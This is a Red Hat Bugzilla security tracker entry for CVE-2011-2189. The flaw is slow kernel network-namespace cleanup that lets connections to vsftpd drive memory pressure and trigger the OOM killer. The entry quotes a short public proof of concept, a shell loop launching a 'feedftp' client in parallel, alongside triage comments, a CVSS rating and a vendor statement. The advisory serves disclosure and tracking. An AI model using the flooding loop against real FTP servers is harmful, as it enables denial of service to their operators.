Bug 711245 (CVE-2011-2189)

Summary: CVE-2011-2189 kernel: net_ns: oom killer fires because of slow net_ns cleanup
Product: [Other] Security Response Reporter: Eugene Teo (Security Response) <eteo>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: arozansk, bhu, dhoward, fhrbata, jkacur, kernel-mgr, kmcmartin, lgoncalv, lwang, mskinner, nobody, plougher, pmatouse, rkhan, rt-maint, sforsber, tcallawa, vgoyal, williams
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2015-07-29 12:48:46 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 711246, 711247, 711248, 749061, 761354    
Bug Blocks:    

Description Eugene Teo (Security Response) 2011-06-06 23:53:28 UTC
It was found that vsftpd, Very Secure FTP daemon, when the network namespace (CONFIG_NET_NS) support was activated in the kernel, used to create a new network namespace per connection. A remote attacker could use this flaw to cause memory pressure (kernel OOM killer protection mechanism to be activated and potentially terminate vsftpd or arbitrary [vsftpd independent] process, which satisfied the OOM killer process selection algorithm).

References:
[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629373
[2] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/720095

Public PoC (from [2]):
======================

The test is started in this way:

$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done

What is observed during the test is that /proc/vmallocinfo grows continually with lines like the following being added:

0xffffe8ffff800000-0xffffe8ffffa00000 2097152 pcpu_get_vm_areas+0x0/0x790
vmalloc
0xffffe8ffffa00000-0xffffe8ffffc00000 2097152 pcpu_get_vm_areas+0x0/0x790
vmalloc
0xffffe8ffffc00000-0xffffe8ffffe00000 2097152 pcpu_get_vm_areas+0x0/0x790
vmalloc

vsftpd bug: https://bugzilla.redhat.com/show_bug.cgi?id=711134

Proposed patches (but has connection rates problem):
http://patchwork.ozlabs.org/patch/88217/

Comment 13 Eugene Teo (Security Response) 2011-10-26 01:20:57 UTC
Created kernel tracking bugs for this issue

Affects: fedora-all [bug 749061]

Comment 15 Eugene Teo (Security Response) 2011-10-30 12:35:47 UTC
This issue is rated 4.6/AV:L/AC:L/Au:S/C:N/I:N/A:C. AV is L instead of N because this is not a flaw in a network service. It can be triggered by any processes that do namespaces isolation. Au is S because to call clone(2) with CLONE_NEWNET, the process has to be privileged (CAP_SYS_ADMIN).

The current /known/ attack vector, vsftpd, does not affect us as it is explained here, https://bugzilla.redhat.com/show_bug.cgi?id=711134#c16.

Comment 17 Eugene Teo (Security Response) 2011-11-11 04:53:02 UTC
[Updated: 2011-11-11]
 
Statement:

This did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 4 and 5 as they did not include support for Network Namespaces. A future kernel update in Red Hat Enterprise MRG may address this issue. The risks associated with fixing this flaw outweigh the benefits of the fix, therefore Red Hat does not plan to fix this flaw in Red Hat Enterprise Linux 6.